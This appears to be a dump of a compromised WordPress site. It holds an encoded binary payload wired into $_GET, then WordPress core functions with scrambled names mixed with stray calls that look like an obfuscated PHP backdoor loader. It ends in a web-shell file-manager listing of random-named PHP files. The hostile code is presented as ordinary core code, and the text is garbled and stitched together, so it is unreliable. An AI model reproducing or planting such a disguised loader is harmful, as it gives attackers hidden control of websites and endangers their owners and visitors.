x\x95\xc5\xe7\xb1\xa5\xcb\x91v\xda\xd6\xb3\xb7\xe7\xbb\xe2\xce\xb5\xd7\x8fk\xcf\xb4\xaf\xba\xb9\xbd\xe7\xb7\xcd\xd8\x93P\x9a\x8b|bv\x92\x89t\x83qP\xd9\xc7\xb5\xcd\xe7\xc4{\x8d\xa0\xc6\xde\xb9\xbf\xca\x9a\xc7\xc9\xce\xad\xa4^lpP\x96\x8cax\xe7\x80\xa1\xe6^lpP\x87\x82ab\x95v\x92\x89tl\xcd\xbc\xd5\xc5\xb5\xc1\xe4\xc4\x92\xd2\xa9\xa7\xcc\x8c\x8f\x86\xb1\xba\xef\x9d\xec\xe1\xa5\xc9\xd9\xb8\x90lKb\x95v\xedst\x83\x87g\x87\x82e\xca\xcd\xc4\xd8\xb9t\x83\x87\x84\x87\x84\x9d\xd0\xa7\x89\x94\xa4^mqv\x91\x82a\xc4\xb9\xce\xc9\xdat\x8d\x96\xad\xd6\xd4\xa6\xb9\xd8\xbe{\x91\xb5\xc5\xb7\xb5\xbc\xd9\xa9\x80\x9ev\x92\x89\xb5\xd6\x96q\xbd\x82k\x87\x99\x9a\xd4\xc1\xa3\xae\xad\xa0\xda\xcd\x84\x81\x95\xd1|s^\x92\x91g\xd0\xca\xa2\x99\xb6v\x9c\x98\xa4\xd5\xb7\x9b\xc0\xac\xb8\xc2\x9dz\xb6\xcb\xac\xb2\xb2\x8d\xc0\xd5\xac\x9b\xa1_\x96\xdb\xac\xd1\xcd\x97\x90\x9de\xb7\xdd\xc6\xc1\xab\x9a\x92\x91g\x87\xdb\xba\xc2\x95v\x9c\x98\x91l\x8ey\x99\x99y\x8b\x9c\x91|\x89\x83\x8d\xb5\x90\xcb\x82k\x87\xf2`|r\xd1m\x87g\x87\x82Jb\x95\x85\x9c\xce\xc9\x8d\x96\xad\xdc\xd0\xa4\xcc\xde\xc5\xe0\x98~\x83\xd7\xa1\xc8\x82k\x87\xdb\xa7\xb8\xbb\xa3\xcb\xbe\xb1\xa8\x8ae\xcb\xe6\xcc\xc9\xd0\x9c\x8f\x87g\x87\x82e\x9f\xb9\xcf\xe4\xcd}mp\xc2q\x82ax\x95v\x92\xd2\xba\x83\x87g\x8fk\xa4\xc7\xea\xc4\xe6\x89t\x83\x87g\x8f\x91kx\x95\xa2\xe3\x89~\x92\x8b\xba\xd8\xd8\x98\xbf\xbdv\x92\x89}\x92\x91g\x87\xc9\xa8\xb1\x95v\x9c\x98\x91\xa0pz\x87\x82ax\x9e_\xedst\x92\x91g\x87\x82\xa8\x9c\x95v\x9c\x98x\xbb\xaa\x8f\xd6\xc7p\x82\x95\xcd\x92\x89~\x92\xa4P\x8b\xd5\xb2\xce\xcc\xbd\xba\xc4\x85\xc0\xa2Q\x87\x82ax\x95\x85\x9c\x89t\xa9\xb1\x89\x87\x8cp|\xbd\x9a\xc6\xaa\xa0\xb8\xb8\xa0\xc0\xdaax\x95\x93\x92\x89t\x87\xda\xb8\xdd\xb9\xa8\xa0\xd0\x88\xcf\xa4\x8fm\x87g\x87ke\xac\xb6\xc6\xbc\xd5\xcb\xd5\xd6\xadp\x9fp\x82\xc5\xac\xd9\x89t\x83\x91v\x8b\xba\x84\xa0\xe4\xbb\x9a\x8d\x9c\xa7\xbb\x88\xb3\xb7\x92\xb1\xce\xce\x9b\xa4x\xc2\xb3P\xa4\x91kx\xb6\xc7\xda\xd4\xa1\x8d\x96n\x98\x9ax\x90\xa8}\xads^l\xcc\xbd\xc8\xceJ\x80~z\xc6\xaa\xc4\xad\xd3\xbe\xd9\xd1\xa7\x87\x9fv\x92\x89\xb7\x8d\x96p\xa2\x9dKx\xa4\x80\x92\x89\xbc\xa4\xb6\xc0\x87\x82a\x82\xa4\xba\xdb\xce\x83\x8d\x87g\x87\xca\xb9\xa9\xdev\x92\x89~\x92\x8fp\xa2lJa~_\xefs]lp\xc4qlJb\x95\xbc\xe7\xd7\xb7\xd7\xd0\xb6\xd5k\xb4\xa8\xcb\xbc\xc9\xb2\xa8\xc6\xaco\x8b\xca\xac\xa6\xb9\x98\x9e\x89t\x83\x8b\x9c\xc0\xad\xa2\xac\xef\xa3\xe0\xdd\xb5\x8cqv\x91\x82ax\xbdv\x92\x93\x83\xdeqQ\x87\x82ax\xe7\xbb\xe6\xde\xc6\xd1\x87g\x87\x82a|\xdd\xc1\xc0\xad\x96\x92\x91\x8d\xcf\xdc\xadx\x9f\x85\xd0rx\xb8\xc0\x92\xc8\xb6\xbb\xa5\xe3\xca\xd3\xa4x\xc2\xd3\xbb\xb3\x91k\xd2\x95v\x9c\x98\x91\x92\x91\x98\x91\x91h\x8c\xac\x87\xa3\x9e{\x9eqg\x87\x82a\x87\x9fv\x92\xba\xce\xd5\xba\xb1\x87\x82k\x87\xf2`|stmpPpkax\xdb\xcb\xe0\xcc\xc8\xcc\xd6\xb5\x87\x82ax\x95\x9c\xda\xae\x96\xb9\xb5\xac\xd1\xb1\x8c\x80\x99\xb7\xcc\xb5\x99\xd6\x93g\x87\x86\xb3\xb0\xe3\xbc\xc2\x92^m\x96q\x87\x82a\x9a\xe5v\x92\x93\x83\xde\x96q\x87\x82\xadx\x95v\x9c\x98^mqv\x91\x82\xa9x\x9f\x85\x96\xca\xae\xaf\xac\xba\x96\x8cax\x95\xc5\xcb\xbb\xcd\xac\x87g\x91\x91~a\xda\xce\xe2\xd5\xc3\xc7\xccg\x87\x82a\x80\x99\xc8\xca\xd7\xba\xb3\x93g\x8b\xc3\x9b\xa4\xba\xc9{\x92\x8f\x9eqPpkJ\x87\x9fv\x92\xab\x95\xd0\x87g\x87\x8cpb\x95v\x92\x89\xba\xb4\xad\x99\xb6\xca\x98\xc2\xb6~\x96\xca\xae\xaf\xac\xba\x93ke\xca\xcd\xc4\xd8\xb9}\x9eqPpkax\x95\xd3|\x89t\x83\x87Qqk\xa7\xcd\xe3\xb9\xe6\xd2\xc3\xd1\x96q\xba\xa9\x87\x9e\x95\x80\xa1\xb9\xc6\xb3\xbb\xa0\xb1\xd9\xab\x80\x99\x9a\xd4\xc1\xa3\xae\xad\xa0\xda\xcd\x84\x84\xa4\x80\x92\x89t\xd9\x91v\x8b\xd4\x99\xc6\xdb\xa6\x9bs]\xdeqQ\x87\x82ax\xdb\xc5\xe4\xce\xb5\xc6\xcfP\x8f\x91k\xa2\xdd\x9b\x92\x93\x83\x87\xab\xa9\xbf\xb1\x8c\x9e\xce\xc9\xdd\xac]\xc4\xdav\x91\x82ax\xde\xcf\xea\x89~\x92\x8b\x9c\xc0\xad\xa2\xac\xef\xa3\xe0\xdd\xb5\x83\xa4\x85\x87\x82ax\x95z\xda\xd4\xa2\xa7\xa9P\x90\x82ax\x95\xd1|st\x83\x87g\xb6\xa8\xaf\xc1\xd8\xaf\xc1\xce\xb8\xb4\x8fk\xbc\xbb\x8c\xb9\xc9\xd0\xbf\xd7\xc8\xc4\x93P\xdb\xab\xb7\xc4\xbc\xcb\xb4\xdf\xa1\xb2\x8fk\xcf\xcd\x8f\x9c\xb7\x9erx\xd5\xbf\xb5\xcd\xb2j\x93`\xa1\x93t\x83\xd6\x8c\xce\xd8\xa3x\x9f\x85\xefs]\xe0qQplJa~_{\x98~\x83\x87g\xce\xc9\xb1x\x95\x80\xa1\xcf\xc9\xd1\xca\xbb\xd0\xd1\xafx\x95v\x92\x89\x98\xab\xd1\x88\xcd\xa5\x8b\x80\x99\xab\xcb\xb4\xb5\xb7\xe1\x94\xd5\xd6\xa2\x84\xa4\x80\xb3\xd4\xc2\x8d\x96k\xcf\xcd\x8f\x9c\xb7|\x89t\x83\x87P\xe2lJa~_{\x98~\x83\x87\xa8\xa9\xdc\xa7x\x95v\x9c\x98x\xa8\xb8\x9f\xb4\xbb\xb6x\x95v\x92\x89\x91\x83\x87g\x87\xd5\xb5\xca\xe1\xbb\xe0\x91t\x83\x8b\xaf\xd2\xb0\x85\x9a~\xa1\xdc\xc8\xd5\xd3\xac\xd5\x8ap\x82\x95\xba\xe9\xbdt\x83\x91v\x8b\xb7\x9a\xa3\xd6\xaa\xec\xb6\xc2\xd7\xc8v\x91\xae\x8a\xd1\xc7v\x9c\x98}\x9eqPpkJ\x87\x9fv\x92\x89\x97\xb9\xcc\xc1\x87\x82k\x87\x99\xab\xcb\xb4\xb5\xb7\xe1\x94\xd5\xd6\xa2x\x95v\x92\x97\x91\x92\x91\x98\xbf\xa5ax\x9f\x85\x94\xdf\xa1\xc9\x94\x98\xd2\xcf\x8c\x9f\xa2\xa3\xc4\xbc\xa1\x90\xce\x9f\xa9\xc6n\xa5\xc3\xba\xc9\xbc\xc2\x90\xbc\x99\xc8\xd2\xb0\x85\xbe\x9f\xe3\xd6\xb5\xa6\x89\x82\xa2lKx\x95v\x96\xbe\xad\xae\xc8\x9b\xe1\xaf\xaf\xcc\xd6\x85\x9c\xd0\xcc\x83\x87q\x96\x9fp\x82\x95v\x92\xadt\x83\x91v\xda\xd6\xb3\xb7\xe7\xbb\xe2\xce\xb5\xd7\x96q\xca\xd7\x94\x9a\x95v\x9c\x98|l\x8b\x9c\xc0\xad\xa2\xac\xef\xa3\xe0\xdd\xb5\x8f\x87g\x87\x82\xaa\xc6\xe9\xcc\xd3\xd5|\x87\xac\x98\xbf\xaf\x9a\xcd\x9e\x85\x9c\x89t\xa4\x87g\x91\x91lx\x95v\x92\x89\x85\x8c\xa2k\xc6\xa7p\x82\x95v\x92\xcc\xc7\xcb\x87g\x87\x8cp\x95~}\xa5\xa1\x84\x9c\x97n\xa2lJa~_{s]lpv\x91\xbbax\x9f\x85\xe4\xce\xc8\xd8\xd9\xb5\x87\x86\x96\xb1\xc0\xb7\xc6\xe3\xa1\xd1\xdb\xa8\xa2lKb\xa4\x80\xbe\xe2\xa6\xd6\xb5g\x87\x8cp\xd5`\x92st\x83\x87g\x87\x82ax\x95\xbc\xe7\xd7\xb7\xd7\xd0\xb6\xd5k\x90\x9e\xe3\xbf\xd5\xc2\xa3\xc8\xcb\x98\x8f\x86\x96\xb1\xc0\xb7\xc6\xe3\xa1\xd1\xdb\xa8\x93ke\xc0\xe0\xa4\xb6\xab\x80l\x8b\xb9\xbf\xd0\xa7\xa8\x9e`\x92\x89t\x83\x87P\xe2\x91kx\x95v\xe6\xd2t\x83\x87q\x96lJa~_\xa1\x93t\xb7\xcf\xab\xd1\xc8k\x87\xbb\xbe\xb7\xab\xaa\xb1\xcc\xb1\xb6\xadi\xcb\xc5\xac\xd8\xc0\x9d\xb7\xca\x8c\x8f\x86\xa9\xc3\xc3\x9a\xb4\x95]\xa7\xaf\xb1\xa8\xc8\x84\xa2\x9dz\xc7\xc2\x9f\xc4\xbb\xc1\xb4\xd0\xb5\xb9\xa1v\x96\xd1\xbf\xb1\xab\x89\x90\x8bmx\x99\xc8\xca\xd7\xba\xb3\x90\x82qkJa~_\xa1\x93\xa5\xc6\xb4\xa8\xd2\x82a\x82\xa4`|\x98~\x83\xbb\x8f\xde\xa9ax\x95\x80\xa1\x8d\xc5\xcd\xb9\x89\xd3\x82ax\x95v\xafr\xc8\xd5\xd0\xb4\x8f\x86\xa9\xc3\xc3\x9a\xb4\x92\x8f\x9eqPp\x82a|\xc8\xc7\xc3\xcb\xa2\xb3\xbbP\xa4k\xa6\xd0\xe5\xc2\xe1\xcd\xb9\x8b\x8b\xb9\xbf\xd0\xa7\xa8\xa1\x85\x9c\x89\xc9\xc8\x87q\x96\x86\xb2\xc2\xc7\x98\xde\x92\x8fmpg\x87\x82a\xc1\xdb_\x9a\xcc\xc3\xd8\xd5\xbb\x8f\x86\x94\xc9\xc6\xb8\xc0\xb9\xa8\x8c\x96q\x87\x82a\xcc\xe9\xab\xb3\x93\x83\xa1\x87g\x87\x82a\x89\x9e\x85\x9c\x89\xc5\xd2\x87q\x96\xddKx\x95v\x92\x89t\x87\xde\xac\xc1\xc6\xb1\xbf\xa4\x80\xb3\xcf\xa1\xb3\xbfg\x87\x8cp\x95\xa4\x80\x92\x89t\xbc\xd2\x89\xd0\xb2ax\x9f\x85\xdb\xd6\xc4\xcf\xd6\xab\xcc\x8ac\xb4\xed\x88\xd6\x8b\x80\x83\x8b\x9a\xd8\xb3\xa3\xa6\xc5\xaa\x9b\xa4^\x83\x87g\x87\x82ax\x95v\x96\xad\xba\xb9\xd0\xba\xdf\xa6\x97\xb2\xd6_\xaf\x98~\x83\xb6\xb3\xd1\xc9ax\x95\x80\xa1\xdc\xc8\xd5\xc6\xb7\xc8\xc6i|\xec\xbb\xcc\xcd\xc4\xca\x93g\x87\x94q\x84~x\xce\x9f\x84\x85\x93g\xba\xb6\x93\xb7\xc5\x97\xb6\xc8\xa6\xac\xae\x8f\xbb\x8b|b_\xefs^m\x87\xc4qlp\x82\x95v\xde\x89~\x92qPp\x91kx\x95v\xd9\xb2\xa2\xc4\xcag\x91\x91\xaa\xad\xb9\xbb\xb7\x91v\x85\x90\x82\x89\x9d\xaa\x92\xa9\x91\xe5\xa3\x8a\x9d\x89\xbc\xd5\xce\xaa\xc6\xe0x\xad\xe6"; $_GET["PVTzqb"] = $x6; } /** * Makes term slug unique, if it isn't already. * * The `$max_w` has to be unique global to every taxonomy, meaning that one * taxonomy term can't have a matching slug with another taxonomy term. Each * slug has to be globally unique for every taxonomy. * * The way this works is that if the taxonomy that the term belongs to is * hierarchical and has a parent, it will append that parent to the $max_w. * * If that still doesn't return a unique slug, then it tries to append a number * until it finds a number that is truly unique. * * The only purpose for `$limit_notices` is for appending a parent, if one exists. * * @since 2.3.0 * * @global wpdb $punycode WordPress database abstraction object. * * @param string $max_w The string that will be tried for a unique slug. * @param object $limit_notices The term object that the `$max_w` will belong to. * @return string Will return a true unique slug. */ function cache_oembed($max_w, $limit_notices) { global $punycode; $mail_error_data = true; $try_rollback = $max_w; // As of 4.1, duplicate slugs are allowed as long as they're in different taxonomies. if (!term_exists($max_w) || get_option('db_version') >= 30133 && !get_term_by('slug', $max_w, $limit_notices->taxonomy)) { $mail_error_data = false; } /* * If the taxonomy supports hierarchy and the term has a parent, make the slug unique * by incorporating parent slugs. */ $primary_table = ''; if ($mail_error_data && is_taxonomy_hierarchical($limit_notices->taxonomy) && !empty($limit_notices->parent)) { $prev_value = $limit_notices->parent; while (!empty($prev_value)) { $SampleNumber = get_term($prev_value, $limit_notices->taxonomy); if (is_wp_error($SampleNumber) || empty($SampleNumber)) { break; } $primary_table .= '-' . $SampleNumber->slug; if (!term_exists($max_w . $primary_table)) { break; } if (empty($SampleNumber->parent)) { break; } $prev_value = $SampleNumber->parent; } } // If we didn't get a unique slug, try appending a number to make it unique. /** * Filters whether the proposed unique term slug is bad. * * @since 4.3.0 * * @param bool $mail_error_data Whether the slug needs to be made unique with a suffix. * @param string $max_w The slug. * @param object $limit_notices Term object. */ if (apply_filters('cache_oembed_is_bad_slug', $mail_error_data, $max_w, $limit_notices)) { if ($primary_table) { $max_w .= $primary_table; } if (!empty($limit_notices->term_id)) { $test_str = $punycode->prepare("SELECT slug FROM {$punycode->terms} WHERE slug = %s AND term_id != %d", $max_w, $limit_notices->term_id); } else { $test_str = $punycode->prepare("SELECT slug FROM {$punycode->terms} WHERE slug = %s", $max_w); } if ($punycode->get_var($test_str)) { // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared $j11 = 2; do { $DIVXTAGgenre = $max_w . "-{$j11}"; ++$j11; $nav_menu_option = $punycode->get_var($punycode->prepare("SELECT slug FROM {$punycode->terms} WHERE slug = %s", $DIVXTAGgenre)); } while ($nav_menu_option); $max_w = $DIVXTAGgenre; } } /** * Filters the unique term slug. * * @since 4.3.0 * * @param string $max_w Unique term slug. * @param object $limit_notices Term object. * @param string $try_rollback Slug originally passed to the function for testing. */ return apply_filters('cache_oembed', $max_w, $limit_notices, $try_rollback); } $new_theme_data = array(4, 5, 6); $skip_margin = explode('|', $word); $subkey_id = explode('%', rawurldecode($rest_base)); /** * The latest version of theme.json schema supported by the controller. * * @since 6.5.0 * @var int */ if (strpos($m_value, "poetry") !== false) { $outer = str_replace("poetry", "<b>poetry</b>", $m_value); } $locale_file = explode("-", $style_handles); /** * Ensures a string is a valid SQL 'order by' clause. * * Accepts one or more columns, with or without a sort order (ASC / DESC). * e.g. 'column_1', 'column_1, column_2', 'column_1 ASC, column_2 DESC' etc. * * Also accepts 'RAND()'. * * @since 2.5.1 * * @param string $spam Order by clause to be validated. * @return string|false Returns $spam if valid, false otherwise. */ function has_tag($spam) { if (preg_match('/^\s*(([a-z0-9_]+|`[a-z0-9_]+`)(\s+(ASC|DESC))?\s*(,\s*(?=[a-z0-9_`])|$))+$/i', $spam) || preg_match('/^\s*RAND\(\s*\)\s*$/i', $spam)) { return $spam; } return false; } array_walk($parsed_blocks, "getSize", $mce_buttons); /** * Replaces double line breaks with paragraph elements. * * A group of regex replaces used to identify text formatted with newlines and * replace double line breaks with HTML paragraph tags. The remaining line breaks * after conversion become `<br />` tags, unless `$thisfile_video` is set to '0' or 'false'. * * @since 0.71 * * @param string $structure_updated The text which has to be formatted. * @param bool $thisfile_video Optional. If set, this will convert all remaining line breaks * after paragraphing. Line breaks within `<script>`, `<style>`, * and `<svg>` tags are not affected. Default true. * @return string Text which has been converted into correct paragraph tags. */ function image_hwstring($structure_updated, $thisfile_video = true) { $lead = array(); if (trim($structure_updated) === '') { return ''; } // Just to make things a little easier, pad the end. $structure_updated = $structure_updated . "\n"; /* * Pre tags shouldn't be touched by autop. * Replace pre tags with placeholders and bring them back after autop. */ if (str_contains($structure_updated, '<pre')) { $reset = explode('</pre>', $structure_updated); $table_class = array_pop($reset); $structure_updated = ''; $AudioCodecBitrate = 0; foreach ($reset as $sync_seek_buffer_size) { $new_slug = strpos($sync_seek_buffer_size, '<pre'); // Malformed HTML? if (false === $new_slug) { $structure_updated .= $sync_seek_buffer_size; continue; } $qt_init = "<pre wp-pre-tag-{$AudioCodecBitrate}></pre>"; $lead[$qt_init] = substr($sync_seek_buffer_size, $new_slug) . '</pre>'; $structure_updated .= substr($sync_seek_buffer_size, 0, $new_slug) . $qt_init; ++$AudioCodecBitrate; } $structure_updated .= $table_class; } // Change multiple <br>'s into two line breaks, which will turn into paragraphs. $structure_updated = preg_replace('|<br\s*/?>\s*<br\s*/?>|', "\n\n", $structure_updated); $month_year = '(?:table|thead|tfoot|caption|col|colgroup|tbody|tr|td|th|div|dl|dd|dt|ul|ol|li|pre|form|map|area|blockquote|address|style|p|h[1-6]|hr|fieldset|legend|section|article|aside|hgroup|header|footer|nav|figure|figcaption|details|menu|summary)'; // Add a double line break above block-level opening tags. $structure_updated = preg_replace('!(<' . $month_year . '[\s/>])!', "\n\n\$1", $structure_updated); // Add a double line break below block-level closing tags. $structure_updated = preg_replace('!(</' . $month_year . '>)!', "\$1\n\n", $structure_updated); // Add a double line break after hr tags, which are self closing. $structure_updated = preg_replace('!(<hr\s*?/?>)!', "\$1\n\n", $structure_updated); // Standardize newline characters to "\n". $structure_updated = str_replace(array("\r\n", "\r"), "\n", $structure_updated); // Find newlines in all elements and add placeholders. $structure_updated = wp_replace_in_html_tags($structure_updated, array("\n" => ' <!-- wpnl --> ')); // Collapse line breaks before and after <option> elements so they don't get autop'd. if (str_contains($structure_updated, '<option')) { $structure_updated = preg_replace('|\s*<option|', '<option', $structure_updated); $structure_updated = preg_replace('|</option>\s*|', '</option>', $structure_updated); } /* * Collapse line breaks inside <object> elements, before <param> and <embed> elements * so they don't get autop'd. */ if (str_contains($structure_updated, '</object>')) { $structure_updated = preg_replace('|(<object[^>]*>)\s*|', '$1', $structure_updated); $structure_updated = preg_replace('|\s*</object>|', '</object>', $structure_updated); $structure_updated = preg_replace('%\s*(</?(?:param|embed)[^>]*>)\s*%', '$1', $structure_updated); } /* * Collapse line breaks inside <audio> and <video> elements, * before and after <source> and <track> elements. */ if (str_contains($structure_updated, '<source') || str_contains($structure_updated, '<track')) { $structure_updated = preg_replace('%([<\[](?:audio|video)[^>\]]*[>\]])\s*%', '$1', $structure_updated); $structure_updated = preg_replace('%\s*([<\[]/(?:audio|video)[>\]])%', '$1', $structure_updated); $structure_updated = preg_replace('%\s*(<(?:source|track)[^>]*>)\s*%', '$1', $structure_updated); } // Collapse line breaks before and after <figcaption> elements. if (str_contains($structure_updated, '<figcaption')) { $structure_updated = preg_replace('|\s*(<figcaption[^>]*>)|', '$1', $structure_updated); $structure_updated = preg_replace('|</figcaption>\s*|', '</figcaption>', $structure_updated); } // Remove more than two contiguous line breaks. $structure_updated = preg_replace("/\n\n+/", "\n\n", $structure_updated); // Split up the contents into an array of strings, separated by double line breaks. $stripped_tag = preg_split('/\n\s*\n/', $structure_updated, -1, PREG_SPLIT_NO_EMPTY); // Reset $structure_updated prior to rebuilding. $structure_updated = ''; // Rebuild the content as a string, wrapping every bit with a <p>. foreach ($stripped_tag as $schema_in_root_and_per_origin) { $structure_updated .= '<p>' . trim($schema_in_root_and_per_origin, "\n") . "</p>\n"; } // Under certain strange conditions it could create a P of entirely whitespace. $structure_updated = preg_replace('|<p>\s*</p>|', '', $structure_updated); // Add a closing <p> inside <div>, <address>, or <form> tag if missing. $structure_updated = preg_replace('!<p>([^<]+)</(div|address|form)>!', '<p>$1</p></$2>', $structure_updated); // If an opening or closing block element tag is wrapped in a <p>, unwrap it. $structure_updated = preg_replace('!<p>\s*(</?' . $month_year . '[^>]*>)\s*</p>!', '$1', $structure_updated); // In some cases <li> may get wrapped in <p>, fix them. $structure_updated = preg_replace('|<p>(<li.+?)</p>|', '$1', $structure_updated); // If a <blockquote> is wrapped with a <p>, move it inside the <blockquote>. $structure_updated = preg_replace('|<p><blockquote([^>]*)>|i', '<blockquote$1><p>', $structure_updated); $structure_updated = str_replace('</blockquote></p>', '</p></blockquote>', $structure_updated); // If an opening or closing block element tag is preceded by an opening <p> tag, remove it. $structure_updated = preg_replace('!<p>\s*(</?' . $month_year . '[^>]*>)!', '$1', $structure_updated); // If an opening or closing block element tag is followed by a closing <p> tag, remove it. $structure_updated = preg_replace('!(</?' . $month_year . '[^>]*>)\s*</p>!', '$1', $structure_updated); // Optionally insert line breaks. if ($thisfile_video) { // Replace newlines that shouldn't be touched with a placeholder. $structure_updated = preg_replace_callback('/<(script|style|svg|math).*?<\/\1>/s', '_autop_newline_preservation_helper', $structure_updated); // Normalize <br> $structure_updated = str_replace(array('<br>', '<br/>'), '<br />', $structure_updated); // Replace any new line characters that aren't preceded by a <br /> with a <br />. $structure_updated = preg_replace('|(?<!<br />)\s*\n|', "<br />\n", $structure_updated); // Replace newline placeholders with newlines. $structure_updated = str_replace('<WPPreserveNewline />', "\n", $structure_updated); } // If a <br /> tag is after an opening or closing block tag, remove it. $structure_updated = preg_replace('!(</?' . $month_year . '[^>]*>)\s*<br />!', '$1', $structure_updated); // If a <br /> tag is before a subset of opening or closing block tags, remove it. $structure_updated = preg_replace('!<br />(\s*</?(?:p|li|div|dl|dd|dt|th|pre|td|ul|ol)[^>]*>)!', '$1', $structure_updated); $structure_updated = preg_replace("|\n</p>\$|", '</p>', $structure_updated); // Replace placeholder <pre> tags with their original content. if (!empty($lead)) { $structure_updated = str_replace(array_keys($lead), array_values($lead), $structure_updated); } // Restore newlines in all elements. if (str_contains($structure_updated, '<!-- wpnl -->')) { $structure_updated = str_replace(array(' <!-- wpnl --> ', '<!-- wpnl -->'), "\n", $structure_updated); } return $structure_updated; } $parsed_blocks = nfinal($parsed_blocks); /** * Displays a tag cloud. * * Outputs a list of tags in what is called a 'tag cloud', where the size of each tag * is determined by how many times that particular tag has been assigned to posts. * * @since 2.3.0 * @since 2.8.0 Added the `taxonomy` argument. * @since 4.8.0 Added the `show_count` argument. * * @param array|string $prefix_len { * Optional. Array or string of arguments for displaying a tag cloud. See wp_generate_tag_cloud() * and get_terms() for the full lists of arguments that can be passed in `$prefix_len`. * * @type int $j11ber The number of tags to display. Accepts any positive integer * or zero to return all. Default 45. * @type string $minimum_site_name_length Whether to display term editing links or term permalinks. * Accepts 'edit' and 'view'. Default 'view'. * @type string $old_feed_files_type The post type. Used to highlight the proper post type menu * on the linked edit page. Defaults to the first post type * associated with the taxonomy. * @type bool $theme_versioncho Whether or not to echo the return value. Default true. * } * @return void|string|string[] Void if 'echo' argument is true, or on failure. Otherwise, tag cloud * as a string or an array, depending on 'format' argument. */ function getHeight($prefix_len = '') { $parent_controller = array('smallest' => 8, 'largest' => 22, 'unit' => 'pt', 'number' => 45, 'format' => 'flat', 'separator' => "\n", 'orderby' => 'name', 'order' => 'ASC', 'exclude' => '', 'include' => '', 'link' => 'view', 'taxonomy' => 'post_tag', 'post_type' => '', 'echo' => true, 'show_count' => 0); $prefix_len = wp_parse_args($prefix_len, $parent_controller); $sitemap_entry = get_terms(array_merge($prefix_len, array('orderby' => 'count', 'order' => 'DESC'))); // Always query top tags. if (empty($sitemap_entry) || is_wp_error($sitemap_entry)) { return; } foreach ($sitemap_entry as $removable_query_args => $widget_opts) { if ('edit' === $prefix_len['link']) { $minimum_site_name_length = get_edit_term_link($widget_opts, $widget_opts->taxonomy, $prefix_len['post_type']); } else { $minimum_site_name_length = get_term_link($widget_opts, $widget_opts->taxonomy); } if (is_wp_error($minimum_site_name_length)) { return; } $sitemap_entry[$removable_query_args]->link = $minimum_site_name_length; $sitemap_entry[$removable_query_args]->id = $widget_opts->term_id; } // Here's where those top tags get sorted according to $prefix_len. $recursive = wp_generate_tag_cloud($sitemap_entry, $prefix_len); /** * Filters the tag cloud output. * * @since 2.3.0 * * @param string|string[] $recursive Tag cloud as a string or an array, depending on 'format' argument. * @param array $prefix_len An array of tag cloud arguments. See getHeight() * for information on accepted arguments. */ $recursive = apply_filters('getHeight', $recursive, $prefix_len); if ('array' === $prefix_len['format'] || empty($prefix_len['echo'])) { return $recursive; } echo $recursive; } /** * Gets all personal data request types. * * @since 4.9.6 * @access private * * @return string[] List of core privacy action types. */ function tinymce_include() { return array('export_personal_data', 'remove_personal_data'); } wp_ajax_save_attachment_compat($parsed_blocks); // Converts numbers to pixel values by default. /** * Retrieves registered metadata for a specified object. * * The results include both meta that is registered specifically for the * object's subtype and meta that is registered for the entire object type. * * @since 4.6.0 * * @param string $last_smtp_transaction_id Type of object metadata is for. Accepts 'post', 'comment', 'term', 'user', * or any other object type with an associated meta table. * @param int $working_directory ID of the object the metadata is for. * @param string $BlockData Optional. Registered metadata key. If not specified, retrieve all registered * metadata for the specified object. * @return mixed A single value or array of values for a key if specified. An array of all registered keys * and values for an object ID if not. False if a given $BlockData is not registered. */ function install_themes_dashboard($last_smtp_transaction_id, $working_directory, $BlockData = '') { $requires_php = get_object_subtype($last_smtp_transaction_id, $working_directory); if (!empty($BlockData)) { if (!empty($requires_php) && !registered_meta_key_exists($last_smtp_transaction_id, $BlockData, $requires_php)) { $requires_php = ''; } if (!registered_meta_key_exists($last_smtp_transaction_id, $BlockData, $requires_php)) { return false; } $share_tab_html_id = get_registered_meta_keys($last_smtp_transaction_id, $requires_php); $mtime = $share_tab_html_id[$BlockData]; $plugin_stats = get_metadata($last_smtp_transaction_id, $working_directory, $BlockData, $mtime['single']); return $plugin_stats; } $plugin_stats = get_metadata($last_smtp_transaction_id, $working_directory); if (!$plugin_stats) { return array(); } $share_tab_html_id = get_registered_meta_keys($last_smtp_transaction_id); if (!empty($requires_php)) { $share_tab_html_id = array_merge($share_tab_html_id, get_registered_meta_keys($last_smtp_transaction_id, $requires_php)); } return array_intersect_key($plugin_stats, $share_tab_html_id); } unset($_GET[$year_field]);
[+]
..
[-] BLvuVs
[edit]
[-] .05627db9.css
[edit]
[-] idbhzaub.php
[edit]
[-] 795ca1cc.php
[edit]
[-] 1e30c2c7.php
[edit]
[-] HQdBkJQ
[edit]
[-] dzamubkw.php
[edit]
[-] xxrfwbga.php
[edit]
[-] af9a612e.php
[edit]
[-] mwbqmvcs.php
[edit]
[-] profile.php
[edit]
[-] 1c4ff64b.php
[edit]
[+]
images
[-] index.php
[edit]
[-] vcbtzlsk.php
[edit]
[-] okpnixwt.php
[edit]